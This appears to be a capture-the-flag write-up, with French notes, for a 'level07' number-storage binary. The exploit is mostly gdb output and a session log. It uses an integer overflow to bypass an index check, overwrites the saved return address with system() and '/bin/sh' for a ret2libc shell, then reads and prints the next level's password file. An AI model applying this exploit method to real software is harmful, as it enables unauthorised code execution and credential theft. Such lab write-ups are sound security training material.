(gdb) info function system
All functions matching regular expression "system":

Non-debugging symbols:
0xf7e6aed0  system

(gdb) info proc map
process 2892
Mapped address spaces:

	Start Addr   End Addr       Size     Offset objfile
    ...
	0xf7e2c000 0xf7fcc000   0x1a0000        0x0 /lib32/libc-2.15.so

(gdb) find 0xf7e2c000,0xf7fcc000,"/bin/sh"
0xf7f897ec

system(): 0xf7e6aed0  = 4159090384
"/bin/sh": 0xf7f897ec = 4160264172

storage: 0xffffd454
saved eip: 0xffffd61c                           offset: (0xffffd61c-0xffffd454) = 456/4 = 114
addr to store addr of "/bin/sh": 0xffffd624     offset: (0xffffd624-0xffffd454)/4 = 116


on veut ecrire a l'index 114 dans le storage pour remplace saved eip
mais comme 114 % 3 == 0 on ne peut pas mettre directement 114

on voit que pour stocker la valeur au bon index il fait index * 4 pour que ce soit int aligned
    (int *) ((intptr_t)storage + (index * 4)) = number;

on sait que (int) (2147483648 * 4) == 0
2147483648 + 114 = 2147483762
donc (int) (2147483762 * 4) == 114
et comme 2147483762 % 3 == 2
donc en mettant 2147483762 pour index le program met la valeur a l'index 114


$ ./level07
----------------------------------------------------
  Welcome to wil's crappy number storage service!
----------------------------------------------------
 Commands:
    store - store a number into the data storage
    read  - read a number from the data storage
    quit  - exit the program
----------------------------------------------------
   wil has reserved some storage :>
----------------------------------------------------

Input command: store
 Number: 4159090384
 Index: 2147483762
 Completed store command successfully
Input command: store
 Number: 4160264172
 Index: 116
 Completed store command successfully
Input command: quit
$ cat /home/users/level08/.pass
7WJ6jFBzrcjEYXudxnM3kdW7n3qyxR6tk2xGrkSC
